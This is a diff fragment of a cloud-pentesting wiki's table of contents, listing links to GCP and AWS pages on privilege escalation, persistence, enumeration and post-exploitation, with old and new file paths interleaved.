- [GCP - Vertex AI Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md)
- [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md)
- [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md)
- [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md)
@@ -148,7 +138,6 @@
- [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md)
- [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md)
- [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md)
- [GCP - Bigtable Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md)
- [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md)
- [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md)
- [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md)
@@ -179,7 +168,6 @@
- [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
- [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
- [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
- [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
- [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
- [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
- [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
@@ -197,7 +185,6 @@
- [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
- [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
- [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
- [GCP - Vertex AI Enum](pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md)
- [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
- [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
- [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)
@@ -229,142 +216,109 @@
- [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
- [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md)
- [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md)
- [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence/README.md)
- [AWS - Cloudformation Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence/README.md)
- [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence/README.md)
- [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence/README.md)
- [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence/README.md)
- [AWS - EC2 ReplaceRootVolume Task (Stealth Backdoor / Persistence)](pentesting-cloud/aws-security/aws-persistence/aws-ec2-replace-root-volume-persistence/README.md)
- [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence/README.md)
- [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence/README.md)
- [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence/README.md)
- [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence/README.md)
- [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence/README.md)
- [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence/README.md)
- [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md)
- [AWS - Cloudformation Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md)
- [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md)
- [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md)
- [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md)
- [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md)
- [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md)
- [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md)
- [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md)
- [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md)
- [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md)
- [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md)
- [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md)
- [AWS - Lambda Alias Version Policy Backdoor](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md)
- [AWS - Lambda Async Self Loop Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md)
- [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md)
- [AWS - Lambda Exec Wrapper Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-exec-wrapper-persistence.md)
- [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence/README.md)
- [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence/README.md)
- [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence/README.md)
- [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence/README.md)
- [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence/README.md)
- [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence/README.md)
- [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/README.md)
- [AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-dlq-backdoor-persistence.md)
- [AWS - SQS OrgID Policy Backdoor](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-orgid-policy-backdoor.md)
- [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md)
- [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence/README.md)
- [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence/README.md)
- [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
- [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
- [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
- [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md)
- [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
- [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
- [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
- [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md)
- [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
- [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
- [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
- [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation/README.md)
- [AWS - Bedrock Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-bedrock-post-exploitation/README.md)
- [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation/README.md)
- [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md)
- [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md)
- [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md)
- [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md)
- [AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-untrusted-pr-webhook-bypass.md)
- [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation/README.md)
- [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation/README.md)
- [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation/README.md)
- [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md)
- [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md)
- [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md)
- [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
- [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
- [AWS Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ami-store-s3-exfiltration.md)
- [AWS - Live Data Theft via EBS Multi-Attach](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-multi-attach-data-theft.md)
- [AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md)
- [AWS EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eni-secondary-ip-hijack.md)
- [AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eip-hijack-impersonation.md)
- [AWS - Security Group Backdoor via Managed Prefix Lists](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-managed-prefix-list-backdoor.md)
- [AWS Egress Bypass from Isolated Subnets via VPC Endpoints](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-endpoint-egress-bypass.md)
- [AWS - VPC Flow Logs Cross-Account Exfiltration to S3](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-flow-logs-cross-account-exfiltration.md)
- [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md)
- [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation/README.md)
- [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation/README.md)
- [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation/README.md)
- [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md)
- [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation/README.md)
- [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md)
- [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md)
- [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md)
- [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md)
- [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md)
- [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md)
- [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md)
- [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md)
- [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md)
- [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md)
- [AWS - Lambda EFS Mount Injection](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md)
- [AWS - Lambda Event Source Mapping Hijack](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md)
- [AWS - Lambda Function URL Public Exposure](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md)
- [AWS - Lambda LoggingConfig Redirection](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md)
- [AWS - Lambda Runtime Pinning Abuse](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md)
- [AWS - Lambda Steal Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
- [AWS - Lambda VPC Egress Bypass](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md)
- [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation/README.md)
- [AWS - MWAA Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-mwaa-post-exploitation/README.md)
- [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation/README.md)
- [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md)
- [AWS - SageMaker Post-Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md)
- [Feature Store Poisoning](pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md)
- [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/README.md)
- [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation/README.md)
- [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation/README.md)
- [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/README.md)
- [AWS - SNS Message Data Protection Bypass via Policy Downgrade](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-data-protection-bypass.md)
- [SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-fifo-replay-exfil.md)
- [AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3)](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-firehose-exfil.md)
- [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/README.md)
- [AWS SQS DLQ Redrive Exfiltration via StartMessageMoveTask](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md)
- [AWS SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-sns-injection.md)
- [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation/README.md)
- [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md)
- [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation/README.md)
- [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation/README.md)
- [Readme](pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md)
- [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
- [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md)
- [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md)
- [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md)
- [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md)
- [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md)
- [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md)
- [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md)
- [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md)
- [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md)
- [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md)
- [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md)
- [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md)
- [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
- [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc/README.md)
- [AWS - AppRunner Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc/README.md)
- [AWS - Bedrock Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md)
- [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc/README.md)
- [AWS - CloudFront](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudfront-privesc/README.md)
- [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc/README.md)
- [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc/README.md)
- [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md)
- [AWS - AppRunner Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md)
- [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md)
- [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md)
- [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md)
- [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md)
- [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md)
- [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md)
- [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md)
- [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
- [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc/README.md)
- [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc/README.md)
- [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc/README.md)
- [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc/README.md)
- [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc/README.md)
- [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc/README.md)
- [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md)
- [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md)
- [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc/README.md)
- [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc/README.md)
- [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc/README.md)
- [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc/README.md)
- [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift/README.md)
- [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc/README.md)
- [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md)
- [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc/README.md)
- [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md)
- [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc/README.md)
- [AWS - Macie Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc/README.md)
- [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc/README.md)
- [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc/README.md)
- [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc/README.md)
- [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc/README.md)
- [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc/README.md)
- [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer/README.md)
- [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc/README.md)
- [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc/README.md)
- [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc/README.md)
- [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc/README.md)
- [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc/README.md)
- [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md)
- [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc/README.md)
- [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md)
- [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc/README.md)
- [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc/README.md)
- [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc/README.md)
- [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md)
- [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md)
- [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md)
- [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md)
- [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md)
- [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md)
- [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md)
- [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md)
- [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md)
- [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md)
- [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md)
- [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md)
- [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md)
- [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md)
- [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md)
- [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md)
- [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md)
- [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md)
- [AWS - Macie Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md)
- [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md)
- [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md)
- [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md)
- [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md)
- [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md)
- [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md)
- [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md)
- [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md)
- [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
